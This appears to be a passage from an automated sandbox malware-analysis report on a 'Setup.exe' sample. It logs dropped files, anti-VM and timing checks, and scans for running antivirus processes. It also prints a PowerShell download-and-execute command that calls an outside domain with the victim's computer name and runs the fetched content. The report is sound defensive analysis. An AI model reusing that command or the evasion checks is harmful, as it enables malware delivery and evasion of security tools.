              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.6.dr Static PE information: real checksum: 0x33908a should be: 0x33af29
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.exe.0.dr Static PE information: section name: .didata
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.6.dr Static PE information: section name: .didata
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.8.dr Static PE information: section name: .didata
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_0205EA26 push eax; mov dword ptr [esp], FAFB0405h 0_2_0205EA34
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_0203988B push edx; ret 0_2_0203988C
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_0202E0D8 push esi; ret 0_2_0202E0DC
              Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_02061526 push eax; mov dword ptr [esp], 828D8CBFh 0_2_0206152B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04D43655 push ebx; iretd 2_2_04D436DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04D43645 push ebx; iretd 2_2_04D436DA
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp File created: C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_isdecmp.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp File created: C:\Users\user\AppData\Local\Temp\is-5R5F8.tmp\_isetup\_isdecmp.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp File created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe File created: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp File created: C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_setup64.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp File created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-7IJ4L.tmp
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe File created: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp File created: C:\Users\user\AppData\Local\Temp\is-5R5F8.tmp\_isetup\_setup64.tmp
              Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\Setup.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\Setup.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\Setup.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeAPI/Special instruction interceptor: Address: 6BC27C44
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BC2F3E1 second address: 6BC2F3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BC2F3FD second address: 6BC2F3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007FD71D48F975h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007FD71D48FA00h 0x00000031 rdtsc
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5509Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4203Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5R5F8.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5R5F8.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\Desktop\Setup.exe TID: 7444Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep count: 5509 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep count: 4203 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: Setup.exe, 00000000.00000003.1972142744.0000000000645000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005544000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000002.2006080250.000000000115D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005544000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1972142744.0000000000681000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000002.2006080250.000000000115D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005544000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
              Source: powershell.exe, 00000002.00000002.1931860240.0000000007926000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\Setup.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020203A9 mov edx, dword ptr fs:[00000030h]0_2_020203A9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02020969 mov eax, dword ptr fs:[00000030h]0_2_02020969
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02020FB8 mov eax, dword ptr fs:[00000030h]0_2_02020FB8
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02020FB9 mov eax, dword ptr fs:[00000030h]0_2_02020FB9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02020D19 mov eax, dword ptr fs:[00000030h]0_2_02020D19
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeNtQuerySystemInformation: Direct from: 0x4585B0
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe "C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; fg
              Source: BrightLib.exe, 00000024.00000000.2410384629.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2452041349.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, is-7IJ4L.tmp.9.drBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidclassgroup%s%uProgram Manager\P{Xps}\H\P{Xan}\P{Lu}\P{Ll}\P{L}\p{Xps}\h\p{Xan}\p{Lu}\p{Ll}\p{L}\p{Xwd}\P{Xwd}\p{Xsp}\P{Xsp}\p{Nd}\P{Nd}Error text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressioninternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
              Source: BrightLib.exe, 00000024.00000000.2410384629.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2452041349.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, is-7IJ4L.tmp.9.drBinary or memory string: regk-hookm-hook2-hooksjoypollPART(no)%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUP...%s[%Iu of %Iu]: %-1.60s%sHKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYMasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDefaultIconNoIconDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe.aut%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s
              Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
